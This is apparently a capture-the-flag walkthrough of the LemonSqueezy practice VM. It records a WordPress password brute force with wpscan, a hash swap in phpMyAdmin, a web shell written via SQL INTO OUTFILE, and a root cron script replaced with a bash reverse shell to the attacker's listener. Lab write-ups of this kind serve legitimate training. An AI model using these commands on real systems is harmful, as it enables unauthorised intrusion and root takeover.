This is a beginner boot2root in a similar style to ones I personally enjoy like Mr Robot, Lazysysadmin and MERCY.

This is a VMware machine. DHCP is enabled, add lemonsqueezy to your hosts. It’s easypeasy!

This box is on the NetSecFocus Admin list of OSCP-like machines. It’s LEMONSQUEEZY: 1 from vulnhub.


We’ve got one port only; HTTP on 80.


So with a quick gobuster fishing expedition we find a couple of interesting things - in particular, wordpress and phpMyAdmin.

Running wpscan gets us two users, lemon and orange. A password attack gets an easy win:

root@kali:/opt/vulnhub/lemonsqueezy# wpscan --url -U 'lemon,orange' -P /usr/share/wordlists/rockyou.txt 
[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - orange / ginger

Using these credentials we can log in to Wordpress, but orange is not an admin. However we can find a post called Keep this safe! which contains a password: n0t1n@w0rdl1st!.

With this, we can login to phpMyAdmin as orange. Once there, we can grab the hash for lemon and try to crack it with Hashcat - it doesn’t work easily. So instead we can change it to the same hash as used by orange, because we know this is ginger. Once we’ve done that we can log in to Wordpress as lemon.


Normally we could run some PHP code in wordpress in a few different ways. We could edit an existing plugin, we could upload a new (malicious) plugin, or we could edit the PHP code of an existing theme. Unfortunately, none of these work because the temporary upload folder hasn’t been set in wp-config.php - and we can’t change it. What’s more, the existing plugin and theme files are all set as non-editable. Again, something we can’t change from the dashboard. Now what?


Back in phpMyAdmin, we can create a new table and then run this SQL on it:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/wp-content/uploads/test.php"

Once we’ve done that, we can visit http://lemonsqueezy/wordpress/wp-content/uploads/test.php and run commands - finally, RCE! Note that I did also set the uploads directory in wp-options in phpMyAdmin but I don’t know if this was actually necessary or not.

This one gets me a shell:


On the box

Running shows a cronjob of interest:

www-data@lemonsqueezy:/dev/shm$ cat /etc/crontab

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    /etc/logrotate.d/logrotate

So this sure looks like a candidate for the logrotten exploit, right? But first let’s just check the contents:

www-data@lemonsqueezy:/dev/shm$ cat /etc/logrotate.d/logrotate
cat /etc/logrotate.d/logrotate
#!/usr/bin/env python
import os
import sys
   os.system('rm -r /tmp/* ')

Ah! Shenanigans! Well it’s fine, because we can write to the file. Let’s replace the contents:

www-data@lemonsqueezy:/dev/shm$ printf '#!/bin/bash\nbash -i >& /dev/tcp/ 0>&1\n' > /etc/logrotate.d/logrotate
<.168.1.77/1235 0>&1\n' > /etc/logrotate.d/logrotate
www-data@lemonsqueezy:/dev/shm$ cat /etc/logrotate.d/logrotate
cat /etc/logrotate.d/logrotate
bash -i >& /dev/tcp/ 0>&1

And now we wait ….


root@kali:/opt/vulnhub/lemonsqueezy# nc -nvlp 1235
Ncat: Version 7.80 ( )
Ncat: Listening on :::1235
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
bash: cannot set terminal process group (23760): Inappropriate ioctl for device
bash: no job control in this shell
root@lemonsqueezy:~# cd /root/
root@lemonsqueezy:~# cat root.txt
cat root.txt

I enjoyed this one and learned some little tricks. Nice one.